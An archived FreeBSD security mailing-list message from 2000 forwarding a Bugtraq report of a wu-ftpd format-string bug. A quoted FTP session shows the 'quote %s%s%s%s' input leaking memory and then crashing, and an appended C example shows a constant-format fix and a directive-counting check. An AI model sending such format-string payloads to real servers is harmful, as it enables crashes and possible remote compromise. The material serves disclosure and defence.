From owner-freebsd-security Mon Oct 2 11:18:51 2000
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.org (lariat.org [12.23.109.2])
    by hub.freebsd.org (Postfix) with ESMTP id 8C0ED37B66C
    for ; Mon, 2 Oct 2000 11:18:43 -0700 (PDT)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2])
    by lariat.org (8.9.3/8.9.3) with ESMTP id MAA07584
    for ; Mon, 2 Oct 2000 12:18:32 -0600 (MDT)
Message-Id: <4.3.2.7.2.20001002113441.04932240@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Mon, 02 Oct 2000 12:18:25 -0600
To: security@FreeBSD.ORG
From: Brett Glass
Subject: ftpd bug in FreeBSD through at least 3.4
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I've received LOTS of anonymous FTP login attempts on the FreeBSD boxen I administer, and have been wondering why. Perhaps this message explains it!

The below works on all 2.x versions of FreeBSD, and in the 3.x branch up until at least 3.4-RELEASE (maybe later).

Am not sure to what extent this bug can be exploited. At best, it would probably just let someone run things as the user "ftp" (the euid used for anonymous FTP logins). This might make it possible to finesse a known local root exploit into a remote one, and/or to start an automated password cracking process (a la the RTM worm) on the system. At worst, it might be possible to parlay it into something worse.

--Brett

>Approved-By: aleph1@SECURITYFOCUS.COM
>Delivered-To: bugtraq@lists.securityfocus.com
>Received: from securityfocus.com (mail.securityfocus.com [207.126.127.78]) by
>    lists.securityfocus.com (Postfix) with SMTP id 259D024C7F5 for
>    ; Mon, 2 Oct 2000 08:27:37 -0700
>    (PDT)
>Received: (qmail 21295 invoked by alias); 2 Oct 2000 15:29:30 -0000
>Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
>Received: (qmail 21292 invoked from network); 2 Oct 2000 15:29:29 -0000
>Received: from unknown (HELO mail.multigroup-bg.com) (212.36.2.250) by
>    mail.securityfocus.com with SMTP; 2 Oct 2000 15:29:29 -0000
>Received: from mgoracle2000 ([192.168.32.220]) by mail.multigroup-bg.com
>    (8.9.3/8.9.3) with SMTP id SAA32372 for ;
>    Mon, 2 Oct 2000 18:28:32 +0300
>MIME-Version: 1.0
>Content-Type: text/plain; charset="iso-8859-1"
>Content-Transfer-Encoding: 8bit
>X-Priority: 3
>X-MSMail-Priority: Normal
>X-Mailer: Microsoft Outlook Express 5.50.4133.2400
>X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
>Message-ID: <001301c02c8d$ca506090$dc20a8c0@mgoracle2000>
>Date: Mon, 2 Oct 2000 18:28:26 +0200
>Reply-To: Javor Ninov
>Sender: Bugtraq List
>From: Javor Ninov
>Organization: MG Bulgaria
>Subject: Wu-ftpd 2.6.1(1)
>To: BUGTRAQ@SECURITYFOCUS.COM
>X-UIDL: 34a5d41e2d991fbaee20ab8924544a45
>
>somewhere:/$ ftp 127.0.0.1
>Connected to 1127.0.0.1.
>220 somewhere.in.internet FTP server (Version wu-2.6.1(1) Mon Jul 3 10:49:59
>EEST 2000) ready.
>Name (0:somebody): ftp
>331 Guest login ok, send your complete e-mail address as password.
>Password:
>230-Welcome, archive user! This is an experimental FTP server. If have any
>230-unusual problems, please report them via e-mail to
>root@somewhere.in.internet
>230-If you do have problems, please try using a dash (-) as the first
>character
>230-of your password -- this will turn off the continuation messages that
>may
>230-be confusing your ftp client.
>230-
>230 Guest login ok, access restrictions apply.
>Remote system type is UNIX.
>Using binary mode to transfer files.
>ftp> quote %s%s%s%s
>500 'TP¿9(NULL)': command not understood.
>ftp>quote %s%s%s%s%s
>Segmentation fault
>somewhere:/$ uname -a
>Linux somewhere 2.2.12 #1 Sun Sep 19 13:35:59 EEST 1999 i686 unknown
>somewhere:/$
>This is a Slackware 4.0 with last wuftpd.tgz ( 02-oct-2000 )
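
Added example (not part of the original message, and not code from wu-ftpd, FreeBSD or any ftp client): the `%s%s%s%s` text in the quoted session comes back as stray bytes and `(NULL)`, which is what happens when user-supplied text reaches a printf-family call as the format string. The message does not show the code at fault, so the function names below are hypothetical; the block builds the same 500 reply with a constant format and adds a simple check for conversion specifiers in a command line.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (an assumption, not taken from any ftpd or ftp
 * client source): build the "500 ... command not understood" reply.
 *
 * Unsafe pattern of the kind that produces output like the quoted session,
 * because the user-supplied text ends up inside the format string:
 *
 *     snprintf(fmt, sizeof fmt, "500 '%s': command not understood.", cmd);
 *     snprintf(out, outlen, fmt);    // second pass expands "%s" from cmd
 *
 * Safe pattern: the format is a constant and cmd is only ever an argument.
 * Returns 0 on success, -1 if the reply would not fit in out.
 */
int build_unknown_reply(char *out, size_t outlen, const char *cmd)
{
    int n = snprintf(out, outlen, "500 '%s': command not understood.", cmd);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Count '%' conversion introducers in untrusted input; "%%" is a literal
 * percent sign and is skipped. A logging heuristic, not the fix itself. */
int count_format_directives(const char *s)
{
    int count = 0;
    for (; *s != '\0'; s++) {
        if (s[0] != '%')
            continue;
        if (s[1] == '%') {        /* escaped percent sign */
            s++;
            continue;
        }
        if (s[1] != '\0')         /* a trailing lone '%' is not counted */
            count++;
    }
    return count;
}

int main(void)
{
    char reply[128];
    const char *cmd = "%s%s%s%s"; /* the string sent with "quote" above */

    if (build_unknown_reply(reply, sizeof reply, cmd) == 0)
        printf("%s\n", reply);    /* 500 '%s%s%s%s': command not understood. */
    printf("directives: %d\n", count_format_directives(cmd));
    return 0;
}
```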